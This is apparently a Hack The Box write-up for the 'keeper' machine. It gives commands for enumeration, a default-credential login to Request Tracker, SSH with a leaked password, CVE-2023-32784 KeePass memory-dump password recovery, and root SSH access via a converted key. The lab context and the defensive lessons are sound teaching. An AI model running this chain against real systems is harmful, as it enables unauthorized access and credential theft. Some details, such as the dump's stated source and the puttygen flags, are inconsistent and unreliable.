HTB: keeper Writeup

Machine Information

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐☆☆☆
• Real-world: ⭐⭐⭐☆☆
• CVE: ⭐⭐☆☆☆
• CTF-like: ⭐⭐☆☆☆

Summary

keeper is an Easy-difficulty Linux machine that demonstrates the risks of default credentials and memory dump vulnerabilities. The attack chain leverages Request Tracker with default credentials for initial access, discovers user credentials in application comments, and exploits CVE-2023-32784 (KeePass memory dump vulnerability) to extract the root SSH key for privilege escalation.

TL;DR: Subdomain enumeration → RT default credentials → User credentials discovery → KeePass dump analysis → Root SSH key extraction → Root access.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- keeper.htb

Results:

22/tcp  open  ssh       OpenSSH 8.9p1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http      nginx 1.18.0 (Ubuntu)

The scan identified SSH and HTTP services. The HTTP service runs nginx, suggesting a web application is hosted.

Service Enumeration

Hostnames: keeper.htb, tickets.keeper.htb

Updated /etc/hosts with both hostnames. Accessing keeper.htb on port 80 displays a default nginx page. However, the subdomain tickets.keeper.htb reveals a Request Tracker (RT) installation.

curl http://tickets.keeper.htb

Request Tracker Login Page: The RT instance presents a login prompt. Testing default credentials reveals access with:

• Username: root
• Password: password

Vulnerability Assessment

Identified Vulnerabilities:

• CVE-2023-32784 — KeePass memory dump vulnerability allowing password extraction from process dumps
• Default Credentials — Request Tracker exposed with default root:password credentials

Initial Foothold

Exploitation Path

Step 1: Identify Request Tracker Subdomain

feroxbuster -u http://keeper.htb -w /path/to/wordlist

This enumeration discovered the tickets.keeper.htb subdomain running Request Tracker.

Step 2: Default Credential Access

Navigating to http://tickets.keeper.htb presented an RT login page. Default credentials were successful:

Username: root
Password: password

Once authenticated, administrative access to the RT instance was granted.

Step 3: User Credential Discovery

Navigating to the user administration panel at http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=lnorgaard, examining the user comments for user lnorgaard revealed an initial password in plaintext:

Welcome2023!

This password likely set during initial user provisioning was never changed.

Step 4: SSH Access as User

ssh lnorgaard@keeper.htb
# Prompted for password
# Enter: Welcome2023!

Successful SSH login as lnorgaard granted initial user-level access to the system.

User Compromise

Credential Discovery

Initial compromise was achieved through discovered credentials in the Request Tracker system. The user lnorgaard had an initial password stored in RT’s user profile comments, likely from provisioning documentation:

Credentials:

• Username: lnorgaard
• Password: Welcome2023!

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Post-Exploitation Enumeration

Upon SSH access as lnorgaard, enumeration of the home directory revealed interesting files:

ls -la ~

Key Discovery: A file named RT30000.zip was found in the home directory. This archive contained:

• A KeePass database file (.kdbx)
• A KeePass memory dump file from PuTTY session

This indicated the presence of privileged credentials stored in KeePass, which could potentially be extracted via the memory dump vulnerability (CVE-2023-32784).

Privilege Escalation

KeePass Memory Dump Exploitation (CVE-2023-32784)

Step 1: Extract and Analyze KeePass Archive

cd ~/
unzip RT30000.zip

The archive contained:

• KeePass.exe.dmp — Memory dump of KeePass process
• passcodes.kdbx — KeePass database file

Step 2: Exploit Memory Dump with keepass-password-dumper

The keepass-password-dumper tool exploits CVE-2023-32784, which allows recovery of the master password from a KeePass memory dump by carving out the plaintext from process memory.

# Download and build keepass-password-dumper
git clone https://github.com/vgrem/keepass-password-dumper
cd keepass-password-dumper
dotnet build

# Run the exploit against the memory dump
dotnet run ../KeePass.exe.dmp

Output:

Found password: ●dgr●d med fl●de

Step 3: Identify Obscured Password

The extracted password contains bullet characters (●) representing unknown characters. The pattern ●dgr●d med fl●de is characteristic of Danish text. Based on context and language patterns, this decodes to:

rødgrød med fløde

This is a traditional Danish dessert name, a reasonable password choice given the Scandinavian context of the user “lnorgaard”.

Step 4: Unlock KeePass Database

keepassx passcodes.kdbx
# Enter password: rødgrød med fløde

Once unlocked, the KeePass database revealed stored credentials, including the root SSH private key in PuTTY format (.ppk).

Step 5: Convert PuTTY Key to OpenSSH Format

The root private key was stored in PuTTY format. Converting to OpenSSH format for use with standard SSH:

puttygen root_key.ppk -O private-openssh-new -o -a 128 -c "" > root_key
chmod 600 root_key

Step 6: SSH as Root

ssh -i root_key root@keeper.htb

Successful authentication as root was achieved using the extracted and converted private key.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Subdomain Enumeration<br/>tickets.keeper.htb"] --> B["Request Tracker Default<br/>Credentials root:password"]
    B --> C["User Profile Enumeration<br/>lnorgaard Password Discovery"]
    C --> D["SSH Access<br/>lnorgaard:Welcome2023!"]
    D --> E["KeePass Archive Discovery<br/>RT30000.zip in Home Dir"]
    E --> F["CVE-2023-32784 Exploitation<br/>keepass-password-dumper"]
    F --> G["KeePass Master Password<br/>Identified: rødgrød med fløde"]
    G --> H["KeePass Database Unlock<br/>Extract Root SSH Key"]
    H --> I["SSH Key Format Conversion<br/>PuTTY to OpenSSH"]
    I --> J["Root SSH Access<br/>Full System Compromise"]

Tools Used

Vulnerability Reference

Key Learnings

1. Subdomain Enumeration is Critical — The primary vulnerability (Request Tracker) would have been missed without explicit subdomain discovery. Active enumeration of DNS records and subdomains is essential.

2. Default Credentials Remain Prevalent — Despite being widely known, default credentials remain effective attack vectors. Manufacturers and administrators must change all default passwords before deployment.

3. In-Application Credential Storage is Dangerous — Storing credentials in user profile comments, tickets, or other application-visible locations creates information disclosure vulnerabilities.

4. Memory Dumps Expose Sensitive Data — Process memory dumps can contain plaintext secrets. KeePass master passwords, encryption keys, and other sensitive material should never persist in memory longer than necessary.

5. Process Dump Analysis is Effective — CVE-2023-32784 demonstrates how attackers can recover cryptographic material from memory dumps. Organizations should prevent unauthorized access to process memory and ensure secure memory handling in security-critical applications.

6. SSH Key Format Conversion is Accessible — Credentials stored in one format (PuTTY .ppk) can be converted to standard formats (OpenSSH) using readily available tools, enabling exploitation.

7. Information Disclosure Chains — This machine demonstrates how seemingly minor information disclosures (credentials in comments, backup files in home directories) create a chain of escalating access.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-32784 #RequestTracker #KeePass #DefaultCredentials #MemoryDump